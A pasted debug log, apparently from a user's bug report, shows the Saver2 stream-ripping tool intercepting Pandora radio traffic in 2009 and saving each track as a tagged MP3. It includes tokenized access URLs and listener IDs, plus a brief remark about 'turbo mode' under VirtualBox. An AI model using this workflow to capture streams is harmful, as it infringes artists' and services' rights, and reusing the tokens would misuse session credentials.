http://audio-sjl-t3-2.pandora.com/access/7982119361396131598?version=4&amp;lid=156635920&amp;token=17n4cPWJN1K1npJ3J%2FgbWIJz9Enzqv8XUIf9%2Fr%2B0J%2FHKfQ38KtOqhGTCPtcdCepmLnfuedlVhPmSKwoY1TgTPUQZULs8CeMBaxAWevzglAl75P9%2Bhu8X%2FXkH7FNs62waVzr0Ayj5awpyTBkTsXP8jMinlLI3KKqQSW0NzNo%2BvyudrBag%2B%2BfTmmHM%2FxWjhZLWgH1Mwtm6h5pvxWIeqcSu5gP48ul6xHf7Y5A%2F%2F%2FQ6bz5Euev1PTZTkD%2BBSI9iljwakRdFMKuKoDeYLAtvtMsD0uUS2MRWbwBGpmN97CIF1%2BmnYCU1%2BTPmXCgMOGZomPv51iUOw%2BQ0BtI%3D 12/10/2009 1:10:19 AM Pandora: Got song S633321, URL = http://audio-ash-t3-1.pandora.com/access/1177883251847313651?version=4&amp;lid=156635920&amp;token=17n4cPWJN1K1npJ3J%2FgbWIJz9Enzqv8XUIf9%2Fr%2B0J%2FHKfQ38KtOqhGTCPtcdCepmLnfuedlVhPmSKwoY1TgTPf4MNA7sARvNY%2FCXnohAN9tGFaTqXtmPrRLF7VLZ24MxCAZXLEab3PckDheOVLR9fLBoXL1%2F%2BI65q9ZYg14LIxHNp0q3e1%2BRL938mezRVLhEUfLm0aDIUQNry4s9uKcvTZajUzLuEh3LSEaFgonuHMPeQIsHgS3IkGnlo7lmINZ9b T%2FBha54YLni%2BVNQRP8Fc7UAKZhtCqgKHP2kmDg2MNBeqFUHVmuFpdllktQ%2FiWiTNoFYKe%2F%2F5QM%3D 12/10/2009 1:10:19 AM Pandora: Got song S208419, URL = http://audio-sjl-t3-2.pandora.com/access/1005261959004485270?version=4&amp;lid=156635920&amp;token=17n4cPWJN1K1npJ3J%2FgbWIJz9Enzqv8XUIf9%2Fr%2B0J%2FHKfQ38KtOqhGTCPtcdCepmLnfuedlVhPmSKwoY1TgTPSct0jWYiKCKVIHZGCr4vOqHJ5NghFrO%2BVr0EoRXRQaqjy8ARDewVtEStzFz6mZLDvAIB5e%2FIEbKEqEI7Sgw2l%2Fo7xZAosqBF1GTsulIK%2FEgsOpEl8UHn8fptOTENiXlR4fwFyICRxegYSi9tRaUuK17L0DDYqwYD6WAFdsobMsXAERW8GvvNy2L YbyyaG77hQ5wNh7LSZJEExmsRzGeSrhYc1HqNzB5ug1oqsd%2B6DSzTTj3xghTFag%3D 12/10/2009 1:10:19 AM Pandora: Got song S581613, URL = http://audio-sjl-t3-1.pandora.com/access/3493350874916306655?version=4&amp;lid=156635920&amp;token=17n4cPWJN1K1npJ3J%2FgbWIJz9Enzqv8XUIf9%2Fr%2B0J%2FHKfQ38KtOqhGTCPtcdCepmLnfuedlVhPmSKwoY1TgTPfAi3dbfEHlZmsb6tY02O7tHj3kVaOJqzTrD 6p%2F3bHlIRexYbJR7lXnGNZ%2Bw82R5UH4mR3Rcu%2B7gGSrgdiyP33Vfz0g7emrJaB5V7uoRaLk3i1JZSQGu4l%2Bos48eHEHR9cEZg5GjKxDAYy9fmFw%2BJ5FPVkyVK98GJ3grVnGeSy1GXLpoT9u5Zz1xD%2BqrmonFJ1f3W5S1bexYbOPZad8kBfYqxCp7p6v43h6%2BWirgl4hjiQTQrGnExDk%3D 12/10/2009 1:10:19 AM PandoraC: Start playing song: Bad Religion - "Against The Grain" on 'Against The Grain' (ID S189317) 12/10/2009 1:10:20 AM StreamPlayer: Play URL http://audio-sjl-t3-2.pandora.com/access/7982119361396131598?version=4&amp;lid=156635920&amp;token=17n4cPWJN1K1npJ3J%2FgbWIJz9Enzqv8XUIf9%2Fr%2B0J%2FHKfQ38KtOqhGTCPtcdCepmLnfuedlVhPmSKwoY1TgTPUQZULs8CeMBaxAWevzglAl75P9%2Bhu8X%2FXkH7FNs62waVzr0Ayj5awpyTBkTsXP8jMinlLI3KKqQSW0NzNo%2BvyudrBag%2B%2BfTmmHM%2FxWjhZLWgH1Mwtm6h5pvxWIeqcSu5gP48ul6xHf7Y5A%2F%2F%2FQ6bz5Euev1PTZTkD%2BBSI9iljwakRdFMKuKoDeYLAtvtMsD0uUS2MRWbwBGpmN97CIF1%2BmnYCU1%2BTPmXCgMOGZomPv51iUOw%2BQ0BtI%3D 12/10/2009 1:10:20 AM #271 GET http://audio-sjl-t3-2.pandora.com/access/7982119361396131598?version=4&amp;lid=156635920&amp;token=17n4cPWJN1K1npJ3J%2FgbWIJz9Enzqv8XUIf9%2Fr%2B0J%2FHKfQ38KtOqhGTCPtcdCepmLnfuedlVhPmSKwoY1TgTPUQZULs8CeMBaxAWevzglAl75P9%2Bhu8X%2FXkH7FNs62waVzr0Ayj5awpyTBkTsXP8jMinlLI3KKqQSW0NzNo%2BvyudrBag%2B%2BfTmmHM%2FxWjhZLWgH1Mwtm6h5pvxWIeqcSu5gP48ul6xHf7Y5A%2F%2F%2FQ6bz5Euev1PTZTkD%2BBSI9iljwakRdFMKuKoDeYLAtvtMsD0uUS2MRWbwBGpmN97CIF1%2BmnYCU1%2BTPmXCgMOGZomPv51iUOw%2BQ0BtI%3D 12/10/2009 1:10:20 AM S189317: Started downloading 12/10/2009 1:10:20 AM StreamPlayer: Data pipe ready 12/10/2009 1:10:20 AM StreamPlayer: Beginning song download 12/10/2009 1:10:20 AM StreamPlayer: Pipe connected 12/10/2009 1:10:21 AM StreamPlayer: Starting data transfer 12/10/2009 1:10:21 AM Pandora: sniffed Bad Religion - "Against The Grain" on 'Against The Grain' (ID S189317) 12/10/2009 1:10:21 AM #272 GET http://images-sjl-t2-2.pandora.com/images/public/amz/1/2/3/0/045778670321_130W_130H.jpg 12/10/2009 1:10:24 AM StreamPlayer: Song download complete 12/10/2009 1:10:24 AM S189317: Finished downloading 12/10/2009 1:10:24 AM S189317: Waiting for AART... 12/10/2009 1:10:24 AM S189317: Got album art 12/10/2009 1:10:24 AM Pandora: sniffed Bad Religion - "Against The Grain" on 'Against The Grain' (ID S189317) 12/10/2009 1:10:24 AM S189317: Submitting song 12/10/2009 1:10:24 AM Saver2: Processing song Bad Religion - "Against The Grain" on 'Against The Grain' (ID S189317) 12/10/2009 1:10:25 AM FILE SAVED, Source: Pandora; MP3 format, 2074748 bytes 12/10/2009 1:10:26 AM Saver2: Tagging aac/mp3 file. 12/10/2009 1:10:27 AM Saver2: Tagging completed 12/10/2009 1:10:27 AM Saver2: Processing completed. 12/10/2009 1:10:27 AM Pandora: Adding Bad Religion - Against The Grain-pandora.mp3 to Punk Rock Favs.m3u 12/10/2009 1:12:18 AM StreamPlayer: Done sending data 12/10/2009 1:12:30 AM PandoraC: Song finished 12/10/2009 1:12:31 AM PandoraC: Start playing song: Bad Brains - "Supertouch/Shittfit" on 'Black Dots' (ID S633321) 12/10/2009 1:12:31 AM StreamPlayer: Play URL http://audio-ash-t3-1.pandora.com/access/1177883251847313651?version=4&amp;lid=156635920&amp;token=17n4cPWJN1K1npJ3J%2FgbWIJz9Enzqv8XUIf9%2Fr%2B0J%2FHKfQ38KtOqhGTCPtcdCepmLnfuedlVhPmSKwoY1TgTPf4MNA7sARvNY%2FCXnohAN9tGFaTqXtmPrRLF7VLZ24MxCAZXLEab3PckDheOVLR9fLBoXL1%2F%2BI65q9ZYg14LIxHNp0q3e1%2BRL938mezRVLhEUfLm0aDIUQNry4s9uKcvTZajUzLuEh3LSEaFgonuHMPeQIsHgS3IkGnlo7lmINZ9b T%2FBha54YLni%2BVNQRP8Fc7UAKZhtCqgKHP2kmDg2MNBeqFUHVmuFpdllktQ%2FiWiTNoFYKe%2F%2F5QM%3D 12/10/2009 1:12:31 AM #273 GET http://audio-ash-t3-1.pandora.com/access/1177883251847313651?version=4&amp;lid=156635920&amp;token=17n4cPWJN1K1npJ3J%2FgbWIJz9Enzqv8XUIf9%2Fr%2B0J%2FHKfQ38KtOqhGTCPtcdCepmLnfuedlVhPmSKwoY1TgTPf4MNA7sARvNY%2FCXnohAN9tGFaTqXtmPrRLF7VLZ24MxCAZXLEab3PckDheOVLR9fLBoXL1%2F%2BI65q9ZYg14LIxHNp0q3e1%2BRL938mezRVLhEUfLm0aDIUQNry4s9uKcvTZajUzLuEh3LSEaFgonuHMPeQIsHgS3IkGnlo7lmINZ9b T%2FBha54YLni%2BVNQRP8Fc7UAKZhtCqgKHP2kmDg2MNBeqFUHVmuFpdllktQ%2FiWiTNoFYKe%2F%2F5QM%3D 12/10/2009 1:12:31 AM S633321: Started downloading 12/10/2009 1:12:32 AM StreamPlayer: Data pipe ready 12/10/2009 1:12:32 AM StreamPlayer: Beginning song download 12/10/2009 1:12:32 AM StreamPlayer: Pipe connected 12/10/2009 1:12:32 AM StreamPlayer: Starting data transfer 12/10/2009 1:12:32 AM Pandora: sniffed Bad Brains - "Supertouch/Shittfit" on 'Black Dots' (ID S633321) 12/10/2009 1:12:33 AM #274 GET http://images-sjl-t2-2.pandora.com/images/public/amz/5/2/4/3/017046753425_130W_130H.jpg 12/10/2009 1:12:33 AM S633321: Got album art 12/10/2009 1:12:33 AM Pandora: sniffed Bad Brains - "Supertouch/Shittfit" on 'Black Dots' (ID S633321) 12/10/2009 1:12:36 AM StreamPlayer: Song download complete 12/10/2009 1:12:36 AM S633321: Finished downloading 12/10/2009 1:12:36 AM S633321: Song AART ready, submitting 12/10/2009 1:12:37 AM Saver2: Processing song Bad Brains - "Supertouch/Shittfit" on 'Black Dots' (ID S633321) 12/10/2009 1:12:37 AM FILE SAVED, Source: Pandora; MP3 format, 2921951 bytes 12/10/2009 1:12:39 AM Saver2: Tagging aac/mp3 file. 12/10/2009 1:12:39 AM Saver2: Tagging completed 12/10/2009 1:12:39 AM Saver2: Processing completed. 12/10/2009 1:12:39 AM Pandora: Adding Bad Brains - Supertouch Shittfit-pandora.mp3 to Punk Rock Favs.m3u 12/10/2009 1:15:22 AM StreamPlayer: Done sending data 12/10/2009 1:15:35 AM PandoraC: Song finished 12/10/2009 1:15:35 AM PandoraC: Start playing song: Black Flag - "Bastard In Love" on 'Loose Nut' (ID S208419) 12/10/2009 1:15:36 AM StreamPlayer: Play URL http://audio-sjl-t3-2.pandora.com/access/1005261959004485270?version=4&amp;lid=156635920&amp;token=17n4cPWJN1K1npJ3J%2FgbWIJz9Enzqv8XUIf9%2Fr%2B0J%2FHKfQ38KtOqhGTCPtcdCepmLnfuedlVhPmSKwoY1TgTPSct0jWYiKCKVIHZGCr4vOqHJ5NghFrO%2BVr0EoRXRQaqjy8ARDewVtEStzFz6mZLDvAIB5e%2FIEbKEqEI7Sgw2l%2Fo7xZAosqBF1GTsulIK%2FEgsOpEl8UHn8fptOTENiXlR4fwFyICRxegYSi9tRaUuK17L0DDYqwYD6WAFdsobMsXAERW8GvvNy2L YbyyaG77hQ5wNh7LSZJEExmsRzGeSrhYc1HqNzB5ug1oqsd%2B6DSzTTj3xghTFag%3D 12/10/2009 1:15:36 AM #275 GET http://audio-sjl-t3-2.pandora.com/access/1005261959004485270?version=4&amp;lid=156635920&amp;token=17n4cPWJN1K1npJ3J%2FgbWIJz9Enzqv8XUIf9%2Fr%2B0J%2FHKfQ38KtOqhGTCPtcdCepmLnfuedlVhPmSKwoY1TgTPSct0jWYiKCKVIHZGCr4vOqHJ5NghFrO%2BVr0EoRXRQaqjy8ARDewVtEStzFz6mZLDvAIB5e%2FIEbKEqEI7Sgw2l%2Fo7xZAosqBF1GTsulIK%2FEgsOpEl8UHn8fptOTENiXlR4fwFyICRxegYSi9tRaUuK17L0DDYqwYD6WAFdsobMsXAERW8GvvNy2L YbyyaG77hQ5wNh7LSZJEExmsRzGeSrhYc1HqNzB5ug1oqsd%2B6DSzTTj3xghTFag%3D 12/10/2009 1:15:45 AM S208419: Started downloading 12/10/2009 1:15:45 AM StreamPlayer: Data pipe ready 12/10/2009 1:15:45 AM StreamPlayer: Beginning song download 12/10/2009 1:15:46 AM StreamPlayer: Pipe connected 12/10/2009 1:15:46 AM StreamPlayer: Starting data transfer 12/10/2009 1:15:46 AM Pandora: sniffed Black Flag - "Bastard In Love" on 'Loose Nut' (ID S208419) 12/10/2009 1:15:46 AM #276 GET http://images-ash-t2-1.pandora.com/images/public/amz/8/2/5/3/018861003528_130W_130H.jpg 12/10/2009 1:15:49 AM S208419: Got album art 12/10/2009 1:15:49 AM Pandora: sniffed Black Flag - "Bastard In Love" on 'Loose Nut' (ID S208419) 12/10/2009 1:15:51 AM StreamPlayer: Song download complete 12/10/2009 1:15:51 AM S208419: Finished downloading 12/10/2009 1:15:51 AM S208419: Song AART ready, submitting 12/10/2009 1:15:51 AM Saver2: Processing song Black Flag - "Bastard In Love" on 'Loose Nut' (ID S208419) 12/10/2009 1:15:51 AM FILE SAVED, Source: Pandora; MP3 format, 3206999 bytes 12/10/2009 1:15:53 AM Saver2: Tagging aac/mp3 file. 12/10/2009 1:15:54 AM Saver2: Tagging completed 12/10/2009 1:15:54 AM Saver2: Processing completed. 12/10/2009 1:15:54 AM Pandora: Adding Black Flag - Bastard In Love-pandora.mp3 to Punk Rock Favs.m3u 12/10/2009 1:16:41 AM PandoraC: Rating Black Flag - "Bastard In Love" on 'Loose Nut' (ID S208419) positively 12/10/2009 1:16:41 AM #277 POST http://www.pandora.com/radio/xmlrpc/v25?rid=0424712P&amp;lid=156635920&amp;method=addFeedback&amp;arg1=164980723472012048&amp;arg2=S208419&amp;arg3=&amp;arg4=R94369&amp;arg5=&amp;arg6=&amp;arg7=true&amp;arg8=false 12/10/2009 1:16:41 AM #277 POST 1280 bytes to www.pandora.com 12/10/2009 1:16:42 AM Pandora: Inspecting XMLRPC 'addFeedback': http://www.pandora.com/radio/xmlrpc/v25?rid=0424712P&amp;lid=156635920&amp;method=addFeedback&amp;arg1=164980723472012048&amp;arg2=S208419&amp;arg3=&amp;arg4=R94369&amp;arg5=&amp;arg6=&amp;arg7=true&amp;arg8=false 12/10/2009 1:16:42 AM Pandora: Sniffed song feedback 12/10/2009 1:16:42 AM Pandora: Song 'Bastard In Love' by Black Flag has been positively rated. 12/10/2009 1:18:32 AM #278 GET /log 2) turbo mode works for a grand total of ~10 sec. I have noticed several times using virtualbox (in which i am running Saver2 in windows) that timer-like operations tend to progress much faster than on real systems (eg you say wait 1 sec it waits 1 ms). Anyways here's the log. 12/10/2009 1:24:15 AM StreamPlayer: Play URL http://audio-ash-t3-1.pandora.com/access/?version=4&amp;lid=156635920&amp;token=yp8GRbS7OvbRObGRWyRcpjplu7MyCwWnRRYJunedtT%2BRqOfp6OVSxK53NjO6rtX51zhmzhOF1FgT8PLfZKq6uMPYMhgA9zHCFesVW1CzE9uGUJHDxfWSCg9t5 eeqTlTLEeOAUi6gwM%2BYD%2BkKOYdW%2BX2Sfnl6%2F%2BSjztInPHMsRj%2FVKBWElIZzslJar33EtQB7ZMAAZfa9mtAAZT4QVic1xYwtdzvTWxH1sqjArVtcjUj5jR%2BGHHXN6X9uTdQ5ULM9uIaQgMi%2Fj1zOQkxsztSrRhzjgKv3%2Fcmc7Zh1y7I9esIJRXVMH%2Bl11%2BXlgTaSVOs4aXumL5RcDDg%3D 12/10/2009 1:24:15 AM #286 GET http://audio-ash-t3-1.pandora.com/access/?version=4&amp;lid=156635920&amp;token=yp8GRbS7OvbRObGRWyRcpjplu7MyCwWnRRYJunedtT%2BRqOfp6OVSxK53NjO6rtX51zhmzhOF1FgT8PLfZKq6uMPYMhgA9zHCFesVW1CzE9uGUJHDxfWSCg9t5 eeqTlTLEeOAUi6gwM%2BYD%2BkKOYdW%2BX2Sfnl6%2F%2BSjztInPHMsRj%2FVKBWElIZzslJar33EtQB7ZMAAZfa9mtAAZT4QVic1xYwtdzvTWxH1sqjArVtcjUj5jR%2BGHHXN6X9uTdQ5ULM9uIaQgMi%2Fj1zOQkxsztSrRhzjgKv3%2Fcmc7Zh1y7I9esIJRXVMH%2Bl11%2BXlgTaSVOs4aXumL5RcDDg%3D 12/10/2009 1:24:15 AM S176175: Started downloading 12/10/2009 1:24:15 AM StreamPlayer: Data pipe ready 12/10/2009 1:24:15 AM StreamPlayer: Beginning song download 12/10/2009 1:24:16 AM StreamPlayer: Pipe connected 12/10/2009 1:24:16 AM StreamPlayer: Starting data transfer 12/10/2009 1:24:16 AM Pandora: sniffed Stiff Little Fingers - "Suspect Device" on 'Long Way To Paradise' (ID S176175) 12/10/2009 1:24:16 AM #287 GET http://images-sjl-t2-1.pandora.com/images/public/amz/3/2/1/4/708535114123_130W_130H.jpg 12/10/2009 1:24:17 AM S176175: Got album art 12/10/2009 1:24:17 AM Pandora: sniffed Stiff Little Fingers - "Suspect Device" on 'Long Way To Paradise' (ID S176175) 12/10/2009 1:24:19 AM StreamPlayer: Song download complete 12/10/2009 1:24:19 AM S176175: Finished downloading 12/10/2009 1:24:19 AM S176175: Song AART ready, submitting 12/10/2009 1:24:20 AM Saver2: Processing song Stiff Little Fingers - "Suspect Device" on 'Long Way To Paradise' (ID S176175) 12/10/2009 1:24:20 AM FILE SAVED, Source: Pandora; MP3 format, 2504828 bytes 12/10/2009 1:24:22 AM Saver2: Tagging aac/mp3 file. 12/10/2009 1:24:22 AM Saver2: Tagging completed 12/10/2009 1:24:22 AM Saver2: Processing completed. 12/10/2009 1:24:22 AM Pandora: Adding Stiff Little Fingers - Suspect Device-pandora.mp3 to Punk Rock Favs.m3u 12/10/2009 1:26:40 AM StreamPlayer: Done sending data 12/10/2009 1:26:52 AM PandoraC: Song finished 12/10/2009 1:26:53 AM PandoraC: Start playing song: The Replacements - "Careless" on 'Sorry Ma, Forgot To Take Out The Trash' (ID S287239) 12/10/2009 1:26:53 AM StreamPlayer: Play URL http://audio-ash-t3-1.pandora.com/access/?version=4&amp;lid=156635920&amp;token=yp8GRbS7OvbRObGRWyRcpjplu7MyCwWnRRYJunedtT%2BRqOfp6OVSxK53NjO6rtX51zhmzhOF1FgT8PLfZKq6uLfPpczT0vPuFh%2BASanjy9Ieuua4ZCshzkg1E8fGOKQCuxqVitDP6P0cSYzdz5BCjxDv60Ksen9%2FT7Ix8%2Bd1HE96mbyT5iKufFRwtub2zirvzfKLDscjcC01OLEcbb4BMWaMDTh%2FJQ0ddlLZPaC6jeiBNWchuwi%2F1qrptaHH5Q5CQ3%2BQHYXML8JvOqNYhOwhi8c5v%2FjTsA2vl3dfZfVz2561csL1lefyRXggzvwnaPexfVM5mTEkCu0%3D 12/10/2009 1:26:53 AM #288 GET http://audio-ash-t3-1.pandora.com/access/?version=4&amp;lid=156635920&amp;token=yp8GRbS7OvbRObGRWyRcpjplu7MyCwWnRRYJunedtT%2BRqOfp6OVSxK53NjO6rtX51zhmzhOF1FgT8PLfZKq6uLfPpczT0vPuFh%2BASanjy9Ieuua4ZCshzkg1E8fGOKQCuxqVitDP6P0cSYzdz5BCjxDv60Ksen9%2FT7Ix8%2Bd1HE96mbyT5iKufFRwtub2zirvzfKLDscjcC01OLEcbb4BMWaMDTh%2FJQ0ddlLZPaC6jeiBNWchuwi%2F1qrptaHH5Q5CQ3%2BQHYXML8JvOqNYhOwhi8c5v%2FjTsA2vl3dfZfVz2561csL1lefyRXggzvwnaPexfVM5mTEkCu0%3D 12/10/2009 1:26:54 AM S287239: Started downloading 12/10/2009 1:26:54 AM StreamPlayer: Data pipe ready 12/10/2009 1:26:54 AM StreamPlayer: Beginning song download 12/10/2009 1:26:54 AM StreamPlayer: Pipe connected 12/10/2009 1:26:55 AM StreamPlayer: Starting data transfer 12/10/2009 1:26:55 AM Pandora: sniffed The Replacements - "Careless" on 'Sorry Ma, Forgot To Take Out The Trash' (ID S287239) 12/10/2009 1:26:55 AM #289 GET http://images-sjl-t2-2.pandora.com/images/public/amg/8/2/2/6/018777376228_130W_130H.jpg 12/10/2009 1:26:56 AM StreamPlayer: Song download complete 12/10/2009 1:26:56 AM S287239: Finished downloading 12/10/2009 1:26:56 AM S287239: Waiting for AART... 12/10/2009 1:27:50 AM StreamPlayer: Done sending data 12/10/2009 1:28:03 AM PandoraC: Song finished 12/10/2009 1:28:03 AM PandoraC: Start playing song: Angelic Upstarts - "Kids On The Street" on 'The EMI Years' (ID S726859) 12/10/2009 1:28:04 AM StreamPlayer: Play URL http://audio-sjl-t3-1.pandora.com/access/3793298040612780267?version=4&amp;lid=156635920&amp;token=yp8GRbS7OvbRObGRWyRcpjplu7MyCwWnRRYJunedtT%2BRqOfp6OVSxK53NjO6rtX51zhmzhOF1FgT8PLfZKq6uGmn1nG8jO7t65D1E9lqucRSGIvuZRybj8D0l 04KQ0WHoMqoZ6hc9i8lqjwN80ns94JROHDoN6AcsncWN6F19uqbS4tu3KCUqC4ALUyxd2sjCteSdIXgT Y VCalWpxn8oicyGjofIIN7rzHstajkn%2BfcXsoq6r3kRfp5X2CCeMvWv7Z1EdOdlxP%2BMnEAYyiIdnrhdGBe34wsncbKmASF3lyNjnzek%2BDFGOZ1D36rM6COOiNzcl2T9q8U%3D 12/10/2009 1:28:04 AM #290 GET http://audio-sjl-t3-1.pandora.com/access/3793298040612780267?version=4&amp;lid=156635920&amp;token=yp8GRbS7OvbRObGRWyRcpjplu7MyCwWnRRYJunedtT%2BRqOfp6OVSxK53NjO6rtX51zhmzhOF1FgT8PLfZKq6uGmn1nG8jO7t65D1E9lqucRSGIvuZRybj8D0l 04KQ0WHoMqoZ6hc9i8lqjwN80ns94JROHDoN6AcsncWN6F19uqbS4tu3KCUqC4ALUyxd2sjCteSdIXgT Y VCalWpxn8oicyGjofIIN7rzHstajkn%2BfcXsoq6r3kRfp5X2CCeMvWv7Z1EdOdlxP%2BMnEAYyiIdnrhdGBe34wsncbKmASF3lyNjnzek%2BDFGOZ1D36rM6COOiNzcl2T9q8U%3D 12/10/2009 1:28:04 AM S726859: Started downloading 12/10/2009 1:28:04 AM StreamPlayer: Data pipe ready 12/10/2009 1:28:04 AM StreamPlayer: Beginning song download 12/10/2009 1:28:05 AM StreamPlayer: Pipe connected 12/10/2009 1:28:05 AM StreamPlayer: Starting data transfer 12/10/2009 1:28:05 AM Pandora: sniffed Angelic Upstarts - "Kids On The Street" on 'The EMI Years' (ID S726859) 12/10/2009 1:28:06 AM #291 GET http://images-sjl-t2-1.pandora.com/images/public/amz/7/2/1/9/724353899127_130W_130H.jpg 12/10/2009 1:28:08 AM StreamPlayer: Song download complete 12/10/2009 1:28:08 AM S726859: Finished downloading 12/10/2009 1:28:08 AM S726859: Waiting for AART... 12/10/2009 1:28:08 AM S726859: Got album art 12/10/2009 1:28:08 AM Pandora: sniffed Angelic Upstarts - "Kids On The Street" on 'The EMI Years' (ID S726859) 12/10/2009 1:28:08 AM S726859: Submitting song 12/10/2009 1:28:09 AM Saver2: Processing song Angelic Upstarts - "Kids On The Street" on 'The EMI Years' (ID S726859) 12/10/2009 1:28:09 AM FILE SAVED, Source: Pandora; MP3 format, 2261576 bytes 12/10/2009 1:28:11 AM Saver2: Tagging aac/mp3 file. 12/10/2009 1:28:11 AM Saver2: Tagging completed 12/10/2009 1:28:11 AM Saver2: Processing completed. 12/10/2009 1:28:12 AM Pandora: Adding Angelic Upstarts - Kids On The Street-pandora.mp3 to Punk Rock Favs.m3u 12/10/2009 1:28:51 AM PandoraC: Rating Angelic Upstarts - "Kids On The Street" on 'The EMI Years' (ID S726859) positively 12/10/2009 1:28:51 AM #292 POST http://www.pandora.com/radio/xmlrpc/v25?rid=0424712P&amp;lid=156635920&amp;method=addFeedback&amp;arg1=164980723472012048&amp;arg2=S726859&amp;arg3=&amp;arg4=R132249&amp;arg5=&amp;arg6=&amp;arg7=true&amp;arg8=false 12/10/2009 1:28:51 AM #292 POST 1280 bytes to www.pandora.com 12/10/2009 1:28:52 AM Pandora: Inspecting XMLRPC 'addFeedback': http://www.pandora.com/radio/xmlrpc/v25?rid=0424712P&amp;lid=156635920&amp;method=addFeedback&amp;arg1=164980723472012048&amp;arg2=S726859&amp;arg3=&amp;arg4=R132249&amp;arg5=&amp;arg6=&amp;arg7=true&amp;arg8=false 12/10/2009 1:28:52 AM Pandora: Sniffed song feedback 12/10/2009 1:28:52 AM Pandora: Song 'Kids On The Street' by Angelic Upstarts has been positively rated. 12/10/2009 1:29:23 AM StreamPlayer: Killing push thread 12/10/2009 1:29:23 AM StreamPlayer: Killing mplayer process 12/10/2009 1:29:23 AM PandoraC: Fetching playlist... 12/10/2009 1:29:23 AM #293 POST http://www.pandora.com/radio/xmlrpc/v25?rid=0424712P&amp;lid=156635920&amp;method=getFragment&amp;arg1=164980723472012048&amp;arg2=0&amp;arg3=&amp;arg4=&amp;arg5=mp3%2Dhifi&amp;arg6=0&amp;arg7=0 12/10/2009 1:29:24 AM #293 POST 1200 bytes to www.pandora.com 12/10/2009 1:29:24 AM Pandora: Inspecting XMLRPC 'getFragment': http://www.pandora.com/radio/xmlrpc/v25?rid=0424712P&amp;lid=156635920&amp;method=getFragment&amp;arg1=164980723472012048&amp;arg2=0&amp;arg3=&amp;arg4=&amp;arg5=mp3%2Dhifi&amp;arg6=0&amp;arg7=0 12/10/2009 1:29:24 AM Pandora: Data format: mp3 12/10/2009 1:29:24 AM Pandora: Got song S1139045, URL = http://audio-ash-t3-1.pandora.com/access/?version=4&amp;lid=156635920&amp;token=peTnY3nH8wcFDQdEEveumM2iOUuFINs5je9oQFeEFXuXExlcfRYVLNpI7vhujLEdoVVnkS s2VxQn%2F%2FD0nbN2GTxxa6hVTCE0o%2FyAkm30NAWRwx5KPnSKFgPCVwOLdw7OoHSyryZlrqP%2B11iVOBgY7O%2BoeYNPuWU%2Fansq%2F3059h0%2Fgaug6RkNiS2z6Ej9q8l5ZlqyCzHOT6VZuJYf2QWENiWCps%2BiGZjFVlPRjw7wQOsJMabqVznCCaBKIoym4mlrVv8fP9QSx87hOpUQIBJXOWeR0MYAUs%2BfW6lw%2FiYMUnN565Wqu5Oe%2BLQA0lalJkZbBpOEO%2Bz74FI%3D 12/10/2009 1:29:24 AM Pandora: Got song S1134599, URL = http://audio-sjl-t3-1.pandora.com/access/?version=4&amp;lid=156635920&amp;token=peTnY3nH8wcFDQdEEveumM2iOUuFINs5je9oQFeEFXuXExlcfRYVLNpI7vhujLEdoVVnkS s2VxQn%2F%2FD0nbN2GajRIqUGjhIV42B2DWE17fHqI8bzbzXkuleoMbuI1dcvvIEIWhBuLZ1GbHaidfMTj5Q%2BC60A99bJt0VXrQD9XwGdAjykC5T5ZGTMIerHAWZ2GzaIpL%2Bv8ngGEsQuoW5K5%2BFnD0rwTSxeCFpoiELle0YTZ6ojO3Acryr%2BxLvTWM5xt0g%2Fm53DBE6OvZRg5VHQ2dn3gUBuSl7VXNWr2VJQ2MkjJYiaAVqLqgkuqFQD0UppR7IkeBiKN1I%3D 12/10/2009 1:29:24 AM Pandora: Got song S127622, URL = http://audio-ash-t2-1.pandora.com/access/8500937478590424838?version=4&amp;lid=156635920&amp;token=peTnY3nH8wcFDQdEEveumM2iOUuFINs5je9oQFeEFXuXExlcfRYVLNpI7vhujLEdoVVnkS s2VxQn%2F%2FD0nbN2GSKaor8VN4HX%2Fd5xhP4m7H0jFWsMiA3UWHwEt%2BK1UWavM30Z5KvQeNmEYY3mDVe7eH%2F1IuovK7sQ24hvQb4l3FfWQc7yk5G%2FGM5d6ucB3Jxt9QTM%2BZCt8nLf5WtrnLL0RWzvpbUC6GLlLH4nXI7IcnWgx500WYlPcIuXIjbniNnyfTFrwxNlxsJMFKG9i0E JCzZh4L6anutNr9arO8mPXeDjki2khSsrzJ0dYY7GGFqY0GdhGlN0WWg%3D 12/10/2009 1:29:24 AM Pandora: Got song S979485, URL = http://audio-sjl-t3-1.pandora.com/access/?version=4&amp;lid=156635920&amp;token=peTnY3nH8wcFDQdEEveumM2iOUuFINs5je9oQFeEFXuXExlcfRYVLNpI7vhujLEdoVVnkS s2VxQn%2F%2FD0nbN2GUIAzYKs6AKmDthcfBkqE9GgjhWyeIa7ZSi58wNbcJopqk%2BbbPLFWMX0D9%2FvSMZQLjkdNpPJspO9Tk%2FfUa%2FNq7TjKO0QvY%2F%2BEsOutSum3vqA3maLcxpVjwlINsuCHbBWOBQEroF%2B1NXMxgcuO4BXsJGmQzFNOf02W7jtC2WnnaCZQlfnTCUXFKddrFTeUOzaNfp7uTJMneL3NkHSQInCG2 PDR8aWFt3VPcVy4zddZZ8GMMrmavKLT4c%3D 12/10/2009 1:29:25 AM PandoraC: Start playing song: Essie Jain - "The Rights" on 'The Inbetween' (ID S1139045) 12/10/2009 1:29:25 AM StreamPlayer: Play URL http://audio-ash-t3-1.pandora.com/access/?version=4&amp;lid=156635920&amp;token=peTnY3nH8wcFDQdEEveumM2iOUuFINs5je9oQFeEFXuXExlcfRYVLNpI7vhujLEdoVVnkS s2VxQn%2F%2FD0nbN2GTxxa6hVTCE0o%2FyAkm30NAWRwx5KPnSKFgPCVwOLdw7OoHSyryZlrqP%2B11iVOBgY7O%2BoeYNPuWU%2Fansq%2F3059h0%2Fgaug6RkNiS2z6Ej9q8l5ZlqyCzHOT6VZuJYf2QWENiWCps%2BiGZjFVlPRjw7wQOsJMabqVznCCaBKIoym4mlrVv8fP9QSx87hOpUQIBJXOWeR0MYAUs%2BfW6lw%2FiYMUnN565Wqu5Oe%2BLQA0lalJkZbBpOEO%2Bz74FI%3D 12/10/2009 1:29:25 AM #294 GET http://audio-ash-t3-1.pandora.com/access/?version=4&amp;lid=156635920&amp;token=peTnY3nH8wcFDQdEEveumM2iOUuFINs5je9oQFeEFXuXExlcfRYVLNpI7vhujLEdoVVnkS 